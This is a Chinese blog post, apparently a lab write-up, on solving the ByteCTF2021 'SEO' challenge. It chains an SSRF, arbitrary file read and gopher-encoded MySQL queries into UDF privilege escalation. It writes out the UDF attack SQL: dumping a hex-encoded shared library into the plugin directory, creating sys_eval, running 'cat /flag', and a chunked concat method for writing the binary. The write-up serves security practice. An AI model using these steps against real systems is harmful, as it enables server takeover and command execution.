其他分享
首页 > 其他分享> > 记一次SSRF练习

记一次SSRF练习

作者:互联网

记一次SSRF练习


老表发我一个SSRF的CTF题,感觉还不错,还能练习下SSRF挖掘技巧,权作学习记录。

审题

环境搭建:

git clone https://github.com/sqlsec/ByteCTF2021-Final-SEO.git
cd ByteCTF2021-Final-SEO/Dockerfile
docker-compose up -d

docker搭建好基本上就是一个seo站长工具界面,撸了一遍接口发现如下接口存在漏洞。

image-20211219225804012

做题

image-20211219225930395

到这基本上就确定SSRF点了,不过这个是我测试方法,一般情况下还要测试下外网域名是否能够访问。

从info.php确定主机内网IP:172.73.23.21,之后就可以进行内网扫描。这个站点还有一个文件下载,能够造成任意文件读取,很有必要的,查看内网的一些信息(proc/net/arp)。

image-20211219230814303

这个还是比较好的一个点,如果有该主机的话就会有mac地址信息。之后用dict进行端口扫描,发现3306端口。

查看info.php可知使用了gopher协议,直接使用工具生成查询语句测试,注意二次URL编码。

image-20211219231732614

image-20211219231932272

后续进行UDF提权,几个命令如下:

#查看主机版本及架构
show variables like '%compile%';
#查看 plugin 目录(/usr/lib/mysql/plugin/)
show variables like 'plugin%';              
SELECT 0x7f454c460201010000000.......00000 INTO DUMPFILE '/usr/lib/mysql/udf.so';
#创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';         
select sys_eval('cat /flag');

交卷

image-20211221121112016

经验总结

1.UDF提权过程中,系统环境可能不同,数据库版本可能不同,需要注意。

2.dll,so文件获取可以在kali的路径/usr/share/metasploit-framework/data/exploits/mysql/下获取。

3.gopherus在使用过程中要注意,不同的系统窗口复制粘贴可能大小限制,数据过长可以直接修改gopherus,避免row_input传参。

4.插入数据过程中有限制的话可以使用如下语句拼接:

create table temp(data longblob);
insert into temp(data) values (0x4d5a9000......);
update temp set data = concat(data,0x33c2e......);
select data from temp into dumpfile '/usr/lib/mysql/plugin/udf.so';

5.udf提权只能创建so库里有的函数,不能随意命名,可以使用objdump -tT lib_mysqludf_sys_64.so查看。

标签:一次,temp,SSRF,练习,so,usr,mysql,data
来源: https://blog.csdn.net/qq_38963246/article/details/122154717